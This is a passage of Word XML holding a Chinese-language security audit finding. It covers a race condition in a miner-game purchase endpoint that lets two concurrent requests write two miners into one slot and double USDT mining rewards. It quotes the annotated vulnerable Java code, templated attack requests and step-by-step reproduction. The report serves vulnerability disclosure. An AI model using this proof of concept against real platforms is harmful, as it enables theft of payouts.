          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>才获取的。这导致两个并发事务可以同时通过坑位检查，并最终将两台矿机写入同一坑位，违反"一坑一机"的核心约束。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">由于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>computeBaseTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndInStorage(userId, 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 查询</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>全部在坑矿机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（无坑位去重逻辑），同一坑位中的两台矿机均参与算力叠加，攻击者可在不额外消耗坑位名额的前提下将该坑位的有效算力翻倍，进而持续获得超额 USDT 收益。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p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP 请求进入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TokenAuthFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（鉴权通过）→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（签名通过）→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.purchase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 由 Token 安全注入，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 来自请求体。核心竞态窗口位于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>purchase()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法内：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[坑位检查] canPlaceInSlot(userId, slotId)   ← 普通 SELECT，无行锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">              ↓ 时间窗口（两个事务均通过检查）</w:t>
              <w:br/>
              <w:t>[账户行锁] findByUserIdForUpdate(userId)    ← 行锁在此才获取</w:t>
              <w:br/>
              <w:t xml:space="preserve">              ↓</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>[矿机落库] userMinerRepository.save(miner)  ← T1 和 T2 均在此写入相同 slotId</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PurchaseForm 字段：</w:t>
              <w:br/>
              <w:t>//   @Min(1) @Max(50) Integer minerLevel;   ← 攻击者可控</w:t>
              <w:br/>
              <w:t>//   @Min(1) @Max(9)  Integer slotId;       ← 攻击者可控（两个并发请求传入相同值）</w:t>
              <w:br/>
              <w:t>@PostMapping("/purchase")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;UserMiner&gt; purchase(@CurrentUserId Long userId,</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                       @RequestBody @Valid PurchaseForm form) { // ← HTTP 可控入口</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserMiner miner = minerService.purchase(userId, form.getMinerLevel(), form.getSlotId()); // ← 污点传入 service</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success(miner);</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 核心漏洞：MinerService.java#purchase</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public UserMiner purchase(Long userId, Integer minerLevel, Integer slotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!canPlaceInSlot(userId, slotId)) {          // ← 【竞态检查点】普通 SELECT，T1/T2 均见空槽</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("坑位未解锁或已被占用");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↑↑↑ T1 通过检查后、T2 也能通过检查 —— 窗口开启 ↑↑↑</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserAccount account = userAccountRepository.findByUserIdForUpdate(userId) // ← 行锁在坑位检查之后才获取</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(() -&gt; new IllegalArgumentException("用户账户不存在")); // T2 在此处阻塞等待 T1 释放锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    account.setGoldBalance(account.getGoldBalance().subtract(price));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userAccountRepository.save(account);            // T1/T2 各自扣款（各付各费，均合规）</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    UserMiner miner = new UserMiner();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setUserId(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setMinerLevel(minerLevel);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setSlotId(slotId);                        // ← 【漏洞点】T1 和 T2 写入相同 slotId，坑位内有两台矿机</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setStatus(1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setIsCharged(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setStarLevel(0);</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    userMinerRepository.save(min</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>er);                // ← T1 提交后 T2 再次写入同一坑位</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    recalcUserLevelAndHashRate(userId);             // ← 以下算力计算将两台矿机均计入</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 坑位检查实现：MinerService.java#canPlaceInSlot（无行锁）</w:t>
              <w:br/>
              <w:t>public boolean canPlaceInSlot(Long userId, Integer slotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!isSlotUnlocked(userId, slotId)) return false;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return userMinerRepository.findByUserIdAndSlotIdAndInStorage(userId, slotId, 0).isEmpty(); // ← 普通 SELECT，非 FOR UPDATE</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ④ 算力叠加 sink：MinerService.java#computeBaseTotalHashRate</w:t>
              <w:br/>
              <w:t>public BigDecimal computeBaseTotalHashRate(Long userId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    List&lt;UserMiner&gt; miners = userMinerRepository.findByUserIdAndInStorage(userId, 0); // ← 无坑位去重，两台矿机均被返回</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return miners.stream()</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .map(m -&gt; {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                BigDecimal base = getBaseOutputForLevel(m.getMinerLevel()); // ← 两台矿机各自贡献算力</w:t>
              <w:br/>
              <w:t xml:space="preserve">                ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">                return base; // 同一坑位的算力被计算两次</w:t>
              <w:br/>
              <w:t xml:space="preserve">            })</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .reduce(BigDecimal.ZERO, BigDecimal::add); // ← 超额算力落入总算力</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 xml:space="preserve">攻击者以相同账户、相同 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 并发发出两个购买请求（需已合法登录、坑位已解锁、金币充足）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>请求 A 与 请求 B 同时发出（Python `threading` / `asyncio` / Burp Repeater 并发 tab 均可）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&lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者合法Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce_A&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;sign_A&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"minerLevel":3,"slotId":1}</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&lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者合法Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce_B&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;sign_B&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"minerLevel":3,"slotId":1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两个请求均返回 HTTP 200 且 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserMiner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对象不同（不同 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），说明坑位 1 已被双写。</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280"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>以合法账户登录，获取有效 Bearer Token；确认坑位 1 已解锁且当前为空，金币余额充足（≥ 2 × 矿机价格）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="281"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用多线程或异步 HTTP 客户端，将以上两个请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">发出，使两个事务在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>canPlaceInSlot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 检查点同时通过（均读到坑位为空），随后 T2 在 UserAccount 行锁处阻塞等待 T1 提交。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="282"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">T1 提交后 T2 继续执行并将第二台矿机写入同一 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，两笔金币均被正常扣除（各付各费），但数据库中坑位 1 存在两条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 UserMiner 记录。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>验证：查询用户矿机列表，坑位 1 有两台矿机；调用算力查询接口，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>totalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等于单台矿机算力的两倍。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="284"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">持续效果：每次 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>computeBaseTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 均将坑位 1 的两台矿机全部计入，USDT 挖矿收益持续以双倍算力计算，攻击者以一个坑位名额获得两个坑位的产出。</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：数据库 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>t_user_miner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表中同一 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userId + slotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 有两条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>in_storage=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>t_user.current_total_hash_rate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段为正常值的两倍；长期来看攻击者通过超额算力持续获取超额 USDT 收益。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285"/>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286"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：任意已登录普通用户；需持有有效签名（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）和 Bearer Token（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TokenAuthFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）；需目标坑位已解锁且金币充足</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="287"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>无需管理员权限，普通玩家账号即可触发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spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者每触发一次坑位双写，即可在不额外占用坑位名额的前提下永久性地将该坑位算力翻倍。由于算力直接驱动 USDT 挖矿奖励（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 及后续挖矿结算均依赖 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>totalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），超额算力将持续转化为超额 USDT 流出，损失规模与坑位算力、USDT 汇率及活动周期正相关，属持续性资金泄漏风险。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; 📎 该 sink 另有 5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受影响调用链（6 条）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="288"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
